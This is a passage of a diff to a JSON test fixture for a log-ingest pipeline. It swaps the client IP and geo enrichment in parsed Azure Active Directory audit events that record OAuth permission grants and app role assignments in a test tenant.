nv_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"ad12e6ca-cb87-4bc5-8103-dbc83cb9a4f8\",\"ModifiedProperties\"
:[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"OldValue\":\"\"}],\"ObjectId\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Operation\":\"Add OAuth2PermissionGrant.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Microsoft Graph\",\"Type\":1},{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":2},{\"ID\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", 
"provider": "AzureActiveDirectory", "kind": "event", @@ -11561,25 +10571,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -11593,7 +10585,7 @@ "ObjectId": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -11729,7 +10721,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { 
@@ -11741,12 +10733,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036412200Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\"},{\"Name\"
:\"targetName\",\"Value\":\"Microsoft Graph\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":null,\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":null,\\\"Name\\\":null}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.3343965Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43118019\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"ad12e6ca-cb87-4bc5-8103
-dbc83cb9a4f8\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"OldValue\":\"\"}],\"ObjectId\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Operation\":\"Add OAuth2PermissionGrant.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Microsoft Graph\",\"Type\":1},{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":2},{\"ID\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + 
"ingested": "2021-12-09T13:41:51.125163800Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\"},{\"Name\":\"targetName\",\"Value\":\"Microsoft 
Graph\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":null,\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":null,\\\"Name\\\":null}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.3343965Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43118019\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"ad12e6ca-cb87-4bc5-8103-dbc83cb9a4f8\",\"ModifiedProperties\"
:[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"OldValue\":\"\"}],\"ObjectId\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Operation\":\"Add OAuth2PermissionGrant.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Microsoft Graph\",\"Type\":1},{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":2},{\"ID\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", 
"provider": "AzureActiveDirectory", "kind": "event", @@ -11772,25 +10764,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -11804,7 +10778,7 @@ "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -11940,7 +10914,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { 
@@ -11952,12 +10926,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036416500Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.1843731Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43117912\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"
Value\":\"R5\"}],\"Id\":\"678f80a3-92c4-4bb6-83a1-1c39d5a87225\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125169100Z", + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) 